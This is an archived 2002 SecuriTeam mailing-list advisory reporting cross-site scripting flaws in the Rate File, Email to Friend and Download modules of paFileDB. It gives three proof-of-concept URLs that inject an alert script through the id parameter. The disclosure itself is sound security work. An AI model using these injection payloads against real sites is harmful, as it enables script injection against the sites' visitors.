[UNIX] XSS Vulnerabilites in paFileDB

From: support@securiteam.com
Date: 10/21/02

From: support@securiteam.com
To: list@securiteam.com
Date: 21 Oct 2002 20:06:47 +0200

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  XSS Vulnerabilites in paFileDB

SUMMARY

 <http://www.phparena.net/pafiledb/> paFileDB is designed to allow
webmasters have a database of files for download on their site. A cross
site scripting vulnerability has been found in the product allowing remote
attackers to cause the product to display 3rd party HTML and JavaScript.

DETAILS

ersatz discovered that there are three other XSS vulnerabilities within
the software that can be performed by editing the URL of three different
sections.

Vulnerable modules:
 * Rate File
 * Email to Friend
 * Download

Unaffected module:
 * Stats

Exploit:
http://vuln/downloads/pafiledb.php?action=rate&id=4?"<scr!pt>alert('Testing')</script>"
http://vuln/downloads/pafiledb.php?action=email&id=4?"<scr!pt>alert('Testing')</script>"
http://vuln/downloads/pafiledb.php?action=download&id=4?"<scr!pt>alert('Testing')</script>"

ADDITIONAL INFORMATION

The information has been provided by <mailto:ersatz@unixhideout.com>
ersatz.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] Apache Multiple Space Header DoS (Multi-Threaded Exploit)
    ... The exploit code below is another version of the Apache 2.0.52 DoS ... vulnerability published previously here: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] JBoot Password Bypassing Vulnerability
    ... housewarming rates on automated network vulnerability ... Place any Windows Startup Floppy ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Suid Application Execution May Give Local Root (Exploit Code)
    ... It is possible for a local user under the FreeBSD operating system to ... For more information about the vulnerability please see: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Texis Sensitive Information Leak
    ... housewarming rates on automated network vulnerability ... The Texis program executes files written in Texis Web Script (a.k.a. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Album.pl Vulnerable to Remote Command Execution
    ... housewarming rates on automated network vulnerability ... Vendor Response: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)